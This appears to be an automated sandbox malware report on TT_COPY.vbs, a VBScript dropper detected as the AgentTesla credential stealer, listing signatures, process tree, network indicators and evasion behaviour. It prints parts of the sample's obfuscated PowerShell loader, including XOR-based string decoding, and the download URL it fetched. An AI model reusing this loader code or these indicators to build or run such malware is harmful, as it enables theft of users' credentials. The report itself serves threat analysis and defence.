Windows Analysis Report
TT_COPY.vbs

Overview

General Information

Sample Name: TT_COPY.vbs
Analysis ID: 758166
MD5: a27bc40b7cf1e7e7e7a9b38221d4e849
SHA1: d24c19f3cf76f8f47fa6fffb12422f0fa0252b3b
SHA256: 28a30c25fb101ed42b050c4b82777929b1cdd9fe02f8f386bb9708d3adb3b9bf

Detection

AgentTesla
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • wscript.exe (PID: 9204 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 2556 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """[...]""";;Function Cartwrighting9 { param([String]$Regionsplanlovs); For($Klistringer=2; $Klistringer -lt $Regionsplanlovs.Length-1; $Klistringer+=(2+1)){ $Smertensbarns = $Smertensbarns + $Regionsplanlovs.Substring($Klistringer, 1); } $Smertensbarns;}$talose0 = Cartwrighting9 'CeIFoEReXPr ';$talose1= Cartwrighting9 $Vildmnd;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $talose1 ;}else{.$talose0 $talose1;} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8364 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}[...]$Cartwrighting=(Get-ItemProperty -Path 'HKCU:\Pseudambulacrum\konstitutionel').Bjfs;[...] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • CasPol.exe (PID: 392 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: CasPol.exe PID: 392 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: CasPol.exe PID: 392 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
No Sigma rule has matched
No Snort rule has matched

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: Joe Sandbox View | IP Address: 185.31.121.136
Source: global traffic | HTTP traffic detected:
  GET /wp-admin/ZCaVuIfIpDLfuryX16 HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: b3solutionscws.com
  Cache-Control: no-cache
Source: unknown | FTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49825
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 2 of 50 allowed.
  220-Local time is now 16:50. Server port: 21.
  220-This is a private system - No anonymous login
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ftp://ftp.mcmprint.netnoffice
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://OowQOv.com
Source: CasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16
Source: CasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16po
Source: powershell.exe, 00000002.00000003.2155125374.0000026AAE6D5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2457016446.0000026AAE735000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.2456250636.0000026AAE70A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.2155125374.0000026AAE6D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://wNUxderhdqerb.org
Source: CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | DNS traffic detected: queries for: b3solutionscws.com

          System Summary

Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """[...]
          Source: Initial file: Impi11.ShellExecute Skyler, " " & chrw(34) + Ce8 + chrw(34), "", "", 0
          Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 21279
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6954
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CC4280
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CC1960
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CD5C38
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CD79E0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CD5128
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDB930
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDDEC8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDDA77
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDC323
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CD4500
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00DAC180
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1F824FA0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1F82D720
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1F827AE0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45AFDA NtQuerySystemInformation,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45AFB8 NtQuerySystemInformation,
          Source: TT_COPY.vbs Initial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll
          Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45AAB6 AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45AA7F AdjustTokenPrivileges,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ai3mehq5.lyv.ps1
          Source: classification engine Classification label: mal96.troj.spyw.evad.winVBS@7/4@2/2
          Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:304:WilStaging_02
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF825BB00BD pushad ; iretd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF825BB0428 push E95D2E73h; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CC6629 push ss; retf 0000h
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CC6638 push ss; retf 0000h
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00DAC431 push 00000039h; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D452551 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D453450 push edx; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45255D push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D453168 push 8140738Fh; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D45343D push esi; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D4533C2 push edi; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D4524DC push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_1D4526F8 push esp; ret
          Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe
          Source: Initial file Initial file: do while timer-temp<sec
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240 Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2076 Thread sleep count: 730 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2076 Thread sleep time: -365000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7240 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9239
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 730
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe System information queried: ModuleInformation
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
          Source: CasPol.exe, 00000007.00000002.6648567310.0000000001090000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
          Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWU%
          Source: CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
          Source: CasPol.exe, 00000007.00000002.6653187392.0000000002B89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 7_2_00CDB5B8 LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vildmnd = """saflauconfacgatunistounnli sussemleeaurgltinefrnansfrbanacarirnprsre0st to{ch ir al ud dopcoaserusapeman(th[fosrethorkoibonsagsu]in`$norafenogunihyoopnmeshapfrlinathnstlvaoisvunsel)bo;hu in po fe fo`$didocewilmuiunnphtbaeherjuvsyanalprlgaetorkonifecosdi no=br whnbeetrwko-fjokobthjraeleccotun bebstyentcieko[cu]hu cr(hy`$mrrdreoagviimyobantvskvpeklovaacnfrlslohovsospi.sulabenenwagsmthuhth no/be ze2co)st;pe sk gt mi sufudomerom(cr`$arkublvaiovssetunremiaznteggeeunrgu=al0re;un tr`$spktjldrimesaktsurfoiunncagmeesaric he-falbrtka ac`$tirwieudgudideoranobsskprelmiaprnanlreoalvinsfo.boltrefanprgfrtsthdd;uu sp`$sykfolgoialsextinrtrilinungskeicrre+fl=zi2he)le{ga ys un pa pr te ta il af`$trdbrenolfoisenfotcaebrrduvpeaarlmulinetrrfonshehyssa[re`$rekomlpaidastrtburoritenvegdoedirop/sw2be]em gk=lo co[poconosuntivunemarkrtta]vi:tr:witreorobvgyettwaede(ma`$grrwhefogtuianononbysdiploldeafonprludofovgrsun.pasfoucobdusbrtforclimentugli(ja`$cekmeliciaysaftmirgricinuvgunestrse,fu te2ho)ko,sk ba1ti6va)fl;ga va ar`$undscekelpiirenfltpeedortevstacolfjltreperacnovedisla[ca`$afktalidiklscotskrhyiunnbrgsueasrte/mo2pe]le zo=mi ne(ne`$pidsleaulsuifanmytfjeanrfevteaprlnolkrelurfrnbyethsob[ek`$bakudltriorslatserosichnjegskethrsp/er2mu]bi be-prbmeximoforgr es1sk6st5fr)de;ar kn gi an ma}he vn[resgatakrhaisinlogox]fi[tasmoycoshatpaechmor.untaleabxovtfo.exekvnnocaaomedstihonasgbo]no:bi:tiadisbecgrilaihu.ragcoevitkosvatprrunilansugha(ec`$madexekvlfaiflnbateneporssvfuajalinlinegorexnbiewhsan)eq;pa}st`$rifupokorsksinkminveifandugmesrerliebrsovurelhotidaurtdiektrdesfa0in=sishimufecergotafeprnknsvibheahyreknmissi0fi dr'mefsv6afdsncfadsu6sudve1inchj0afcun8da8udbbvcma1bacre9vacor9sa'un;al`$lifodokerhoslikconhuitrnspgdoslarsueejsteutelvetbiagrtreeovransle1wa=ouslummoeurrbrtumekanhyspobmuawirinnansno0br 
no'udean8kocrucuncdo6trdwo7cuccuafadha6lycdiauncne3krdca1ma8flbimfdi2ddcdycsacgrbse9am6ch9ok7re8grbskfhu0recfibmoddi6nacco4skcun3hicbr0keetrbpocsh4grdre1ancbocyndso3micaf0saeun8sacto0tidco1scczodnocflamecut1kodse6bo'sq;gr`$fifdoostrnoskokidncoiblnskgjossprdaetssteuunlsttsvaprthoechrhysdi2ny=posummpeeknrqutclehonidsfobfoaprrunnkospo0ra ve'trepa2imcre0spdpr1vafca5tedpa7lycbrahecsi6dieir4vacfr1dacva1upddu7tecgy0hodre6uddsu6de'me;ud`$grfteolerluscukclnraisanhagciscyrbeedesvausylfotskaantmuesarudset3la=rasstmekeskrsathuesuntrsinbbeaherronfosku0he co'frfre6sldmecfodin6bedop1tocbu0cocul8gu8mebunfco7opdmo0macwebjadvi1plcjocarcsh8bacst0nu8cobmeerecdicfebtadly1socom0eudaf7recsuatoddh5brfva6pscin0feddi7madba3kacchcrecme6flcde0uidhu6re8rebgeesedbacsp4klcstbrycca1skcfr9dacke0esfmi7uncdu0prcas3hf'gr;de`$pofchomirpesdikflninibanovgsasmarkaegrsbeuvalfotfratrthiealrstskl4da=fosnomfjegorsvtgrebunkaslgbsparorunnsosin0al gr'jodad6endse1pedch7dicprcamcsybfrcpi2mu'ra;we`$irfbrolursuscoktonfeiannnogtasmirpieliscautalextkaasptdoeunrsisir5do=ocsmimbaestrretltesonfusudbgramurfonmosdr0m
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 
